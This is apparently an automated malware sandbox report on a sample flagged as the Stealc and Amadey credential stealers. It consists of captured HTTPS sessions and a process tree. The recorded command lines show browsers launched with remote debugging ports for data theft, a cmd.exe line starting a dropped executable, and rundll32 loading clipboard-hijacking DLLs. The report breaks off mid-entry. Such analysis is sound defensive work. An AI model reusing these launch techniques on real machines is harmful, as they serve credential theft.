Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.5	49930	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:34 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:35 UTC	515	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:35 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: c96e57bf-a01e-00ab-735a-329106000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035535Z-15869dbbcc6kg5mvhC1DFW39vn00000002d000000000n5c7 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:35 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.5	49931	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:34 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:34 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:34 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: f884d1af-801e-008f-4f68-322c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035534Z-17df447cdb5l865xhC1DFW9n7g000000059g00000000a9cp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:34 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.5	49933	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:34 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:34 UTC	515	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:34 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: b51813c1-401e-002a-5f12-32c62e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035534Z-16547b76f7frbg6bhC1DFWr5400000000bwg00000000sptn x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:34 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.5	49932	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:34 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:35 UTC	515	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:34 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: 0ad2dbdf-401e-005b-319c-319c0c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035534Z-15869dbbcc6zbpm7hC1DFW75xg00000005e0000000006hp8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-10 03:55:35 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.5	49934	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:34 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:35 UTC	538	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:34 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: 70b2909d-801e-00ac-33c1-2cfd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035534Z-16547b76f7frbg6bhC1DFWr5400000000bz000000000e6mm x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:35 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.5	49936	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:35 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:35 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:35 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 84bace10-701e-000d-3862-326de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035535Z-17df447cdb5km9skhC1DFWy2rc00000008u0000000001cr2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:35 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Target ID:	0
Start time:	22:54:54
Start date:	09/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x5a0000
File size:	1'769'472 bytes
MD5 hash:	38F7509D769058697F81EF17CFBE8C87
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2020668907.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2407206885.00000000005A1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2409398510.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	22:55:02
Start date:	09/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	22:55:03
Start date:	09/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2172,i,10839052718167675908,6568144357530153640,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:55:12
Start date:	09/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	22:55:12
Start date:	09/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2284,i,16948042594527943735,4818117858943620130,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	22:55:13
Start date:	09/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	22:55:13
Start date:	09/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	22:55:17
Start date:	09/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6920 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	22:55:17
Start date:	09/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6972 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	22:55:32
Start date:	09/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsDHCAECGIEB.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	22:55:32
Start date:	09/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	22:55:33
Start date:	09/11/2024
Path:	C:\Users\user\DocumentsDHCAECGIEB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\DocumentsDHCAECGIEB.exe"
Imagebase:	0x560000
File size:	3'258'368 bytes
MD5 hash:	571952385750F4874BB235D9E5E61120
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.2449462094.0000000000561000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	22:55:36
Start date:	09/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0xad0000
File size:	3'258'368 bytes
MD5 hash:	571952385750F4874BB235D9E5E61120
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000002.2487450348.0000000000AD1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	22:56:00
Start date:	09/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xad0000
File size:	3'258'368 bytes
MD5 hash:	571952385750F4874BB235D9E5E61120
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000018.00000002.5401595733.0000000000AD1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	22:56:07
Start date:	09/11/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main
Imagebase:	0x1000000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	22:56:11
Start date:	09/11/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll, Main
Imagebase:	0x1000000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	22:56:13
Start date:	09/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7020 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	22:56:17
Start date:	09/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe"
Imagebase:	0xaa0000
File size:	3'205'120 bytes
MD5 hash:	AE39EF9A549CC7FEB4940602F7F9AF7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000003.2952185414.00000000012F4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 39%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	22:56:18
Start date:	09/11/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main
Imagebase:	0x7ff66cf20000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	22:56:18
Start date:	09/11/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main
Imagebase:	0x1000000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	22:56:25
Start date:	09/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	22:56:27
Start date:	09/11/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll, Main
Imagebase:	0x7ff66cf20000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	22:56:27
Start date:	09/11/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll, Main
Imagebase:	0x1000000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	22:56:32
Start date:	09/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe
Wow64 process (32bit):	true
